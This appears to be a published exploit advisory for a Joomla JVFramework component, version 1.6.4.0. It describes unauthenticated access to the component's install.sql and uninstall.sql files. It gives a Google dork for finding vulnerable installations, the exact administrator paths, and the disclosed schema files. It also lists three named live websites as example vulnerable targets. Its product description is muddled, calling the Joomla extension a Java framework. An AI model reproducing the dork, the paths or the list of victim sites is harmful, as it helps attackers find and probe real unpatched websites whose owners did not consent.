Joomla JVFramework Components 1.6.4.0 Database Disclosure

1. ####################################################################
2.  
3. # Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 19/01/2019
7. # Vendor Homepages : joomlavi.com ~ jvframework.com
8. # Software Download Link :
9. bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
10. # Software Information Link : sourceforge.net/projects/jvframework/
11. # Software Affected Version : 1.6.4.0
12. # Tested On : Windows and Linux
13. # Category : WebApps
14. # Exploit Risk : Medium
15. # Google Dorks : inurl:''/administrator/components/com_jvframework/''
16. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
17. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
18. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
19.  
20. ####################################################################
21.  
22. # Description :
23. **************
24. *JV Framework brings you the power to handle your website in the most elegant way.
25. *JV Framework has got the first-time deployed Drag and Drop feature.
26. *JVFramework is an application framework for Java. It's main goal is to avoid code duplication
27. (such as metatada, UI programming, etc) related to the construction of a
28. web application, providing a declarative language for business tier programming.
29.  
30. ####################################################################
31.  
32. # Database Disclosure Exploit :
33. ***************************
34.  
35. /administrator/components/com_jvframework/installation/install.sql
36. /administrator/components/com_jvframework/installation/uninstall.sql
37.  
38. ####################################################################
39.  
40. # Information : [ uninstall.sql ] =>
41. ************
42. -- --------------------------------------------------------
43. DROP TABLE IF EXISTS `#__jv_themes`;
44. -- --------------------------------------------------------
45. DROP TABLE IF EXISTS `#__jv_theme_assign`;
46.  
47. *******************************************
48.  
49. # Information : [ install.sql ] =>
50.  
51. -- -------------------------------------------------------------
52.  
53. CREATE TABLE IF NOT EXISTS `#__jv_themes` (
54. `id` int(11) NOT NULL AUTO_INCREMENT,
55. `theme` varchar(50) NOT NULL,
56. `home` tinyint(1) NOT NULL,
57. `params` varchar(10240) NOT NULL,
58. `published` tinyint(1) NOT NULL DEFAULT '0',
59. PRIMARY KEY (`id`)
60. ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
61.  
62. -- -------------------------------------------------------------
63.  
64. CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
65. `id` int(11) NOT NULL AUTO_INCREMENT,
66. `menuid` int(11) NOT NULL,
67. `themeid` int(11) NOT NULL,
68. PRIMARY KEY (`id`)
69. ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
70.  
71. ####################################################################
72.  
73. # Example Vulnerable Sites :
74. *************************
75.  
76. [+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql
77.  
78. [+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql
79.  
80. [+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql
81.  
82. ####################################################################
83.  
84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
85.  
86. ####################################################################